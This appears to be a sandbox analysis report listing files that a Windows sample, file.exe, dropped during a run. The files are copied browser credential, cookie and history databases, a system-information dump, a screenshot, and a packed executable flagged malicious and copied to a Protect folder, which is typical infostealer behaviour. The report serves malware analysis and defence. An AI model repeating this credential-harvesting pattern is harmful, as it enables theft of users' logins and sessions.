                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\5PaUKQKCn1cOHistory

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):159744
                    Entropy (8bit):0.5394293526345721
                    Encrypted:false
                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                    Malicious:false
                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\D87fZN3R3jFeplaces.sqlite

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):5242880
                    Entropy (8bit):0.03859996294213402
                    Encrypted:false
                    SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                    MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                    SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                    SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                    SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                    Malicious:false
                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\GNGpmTFam5reWeb Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\HYMDMNDHbpvCLogin Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\KNCS9xAjcy97Login Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\Ln2ferf9cd9cHistory

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):159744
                    Entropy (8bit):0.5394293526345721
                    Encrypted:false
                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                    Malicious:false
                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\M2i6MTywpfRAHistory

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):155648
                    Entropy (8bit):0.5407252242845243
                    Encrypted:false
                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                    MD5:7B955D976803304F2C0505431A0CF1CF
                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                    Malicious:false
                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\OaQuGlYHO2B0Web Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\Pe4W1HgFYxyTHistory

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):155648
                    Entropy (8bit):0.5407252242845243
                    Encrypted:false
                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                    MD5:7B955D976803304F2C0505431A0CF1CF
                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                    Malicious:false
                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\UdeNZdOQSPDWWeb Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\VCEccbr_cvO2Cookies

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.8439810553697228
                    Encrypted:false
                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\g85sD372nZcyCookies

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                    Category:dropped
                    Size (bytes):20480
                    Entropy (8bit):0.6732424250451717
                    Encrypted:false
                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                    SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 83%
                    Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\qUesDvlJI_ZiWeb Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\sl01HQPBKH54Web Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\tnqSg6erqMxtWeb Data

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\yDHoBcv6VALYLogin Data For Account

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo\Cookies\Chrome_Default.txt

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with very long lines (369), with CRLF line terminators
                    Category:dropped
                    Size (bytes):530
                    Entropy (8bit):5.999391385907715
                    Encrypted:false
                    SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                    MD5:06ED2CD304730F55A5C7001509E128BE
                    SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                    SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                    SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                    Malicious:false
                    Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..

                    C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo\History\Firefox_v6zchhhv.default-release.txt

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):112
                    Entropy (8bit):4.9113057226932435
                    Encrypted:false
                    SSDEEP:3:N8DSLvIJiMgTE2WdkQVjDSLvIJiMhKVX3L2WdkQVQ:2OLciodFOLciA8dq
                    MD5:0CE7E561D96623E70DD177304D3B56DA
                    SHA1:27B4131817E71657AED90C086E01E7E925BF641E
                    SHA-256:E0B2F92CFB58B7D5EDFBB1FDF3E81194D4E55A90706986C389BDF21D2AD2325D
                    SHA-512:48154E76523305BBB7ED39FEAD22CB4DD6FDD568259DC8D0E70ABA4A21030DAF6D1274E0DC5D7F10DFCF7B3B61BD2401FFB4768F301AEF04F142AF23EF335AB5
                    Malicious:false
                    Preview:https://www.mozilla.org/privacy/firefox/.1696426831..https://www.mozilla.org/en-US/privacy/firefox/.1696426831..

                    C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo\information.txt

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):6549
                    Entropy (8bit):5.6055337767834965
                    Encrypted:false
                    SSDEEP:96:xzDyJ2mRkoc2KBhA6tsxODsZ8svxhjANUbg3x:xfYyoX6tsxPZ8skB
                    MD5:F949146D8F44A5E3B39FFA8B299C2CE4
                    SHA1:7764E054E6A828328274D08D593F17D996027466
                    SHA-256:34F3899A8081AA366C82D37E25B800E63D675DB221E3BB375D785C3BDE64B2D3
                    SHA-512:1E2843ECFFEF386A1BC2A08619A2256A2D639E20C886D5A7349D11EC38C10FDA574010740EC909FACA4EB938FEE666CB37B2AF9DDB7EBA7C5C89DE8BD3369423
                    Malicious:false
                    Preview:Build: default..Version: 2.0....Date: Fri May 17 17:45:09 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 3d7cb3c48b150bab83c70d51fda6606f....Path: C:\Users\user\Desktop\file.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo....IP: 12.205.151.60..Location: US, San Francisco..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 855271 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 17/5/2024 17:45:9..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.ex

                    C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo\passwords.txt

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):4897
                    Entropy (8bit):2.518316437186352
                    Encrypted:false
                    SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                    MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                    SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                    SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                    SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo\screenshot.png

                    Download File
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):711746
                    Entropy (8bit):7.924358481947605
                    Encrypted:false
                    SSDEEP:12288:LN5Ik7hE5TUlevY31R2XSefNY396zjUvZKyn7tg1czUxd8B+x5ruugEnlV1MCvXu:Yk78Uj1RySeC0zjoKy7e1Z/8ofcEjm
                    MD5:576DFC1AEDDC22FF1B5B2ED158DCDEFD
                    SHA1:3BF1C8AC4E8541BB33DB2F6672DF544F5C32B4D4
                    SHA-256:9731A447D10DC67279FC1D5DA41A48637E4FE5C685FDC95EAF090EA0B6BEA50F
                    SHA-512:7AB6B3136DFF3CFA505266649352247BBBE3303D2DE02453D695693EA1FB5015F9925669BC555A15F66033484F613EAD769560AD60A9546C31C74781D9BEA7D3
                    Malicious:false
                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mG........ms......c...~.VuU..UUt.V.{o......$.......$.,.@.S.E...9...d......./..............1#..;...7f......<9.'...N....^'?5..I......3.......Nx|..7"S..|_.....:~..q....-.Wl!..........y1.......0|...Jo.C.b....H.G.}G0u......X..h.......w...b......S........].|...J...L.TE..w.....X...{.A.=w.d.."....w.=...w..1...'.....A.Z~0+..>7.o..H.TL......g..L.%.......M.Y..|_..z.wG...1S..Na....^{.......:Gc..1.....k,|..z.-...%..2..w.knJ.W......t..3X..S........../.X...c....{e....\?...L..%.7,}E.g..2...X....u........|..i..y...MK^~M..X......].-....9g.?.}.u..6M.uM..yu..qU.._..|o9.. .v...9gEn...y......nW.9.K.>..,....hk...=.N.....0^.{....B..+...}.O+........#..=.......].k..../L.zY......|.|...v...-.......u3.....+.g].?..]//..-.%.S.s.o...s...;....S;\RX..yLN.s.Kv..P....!.}..v...m/)..;.....osq7.s.a..y_..b-......vy}n5^.m....d.|..'.<A.y`n..;.1..{.....E%...%.\].

                    C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe
                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                    Category:dropped
                    Size (bytes):4563640
                    Entropy (8bit):7.906115886926003
                    Encrypted:false
                    SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                    MD5:AF6E384DFABDAD52D43CF8429AD8779C
                    SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                    SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
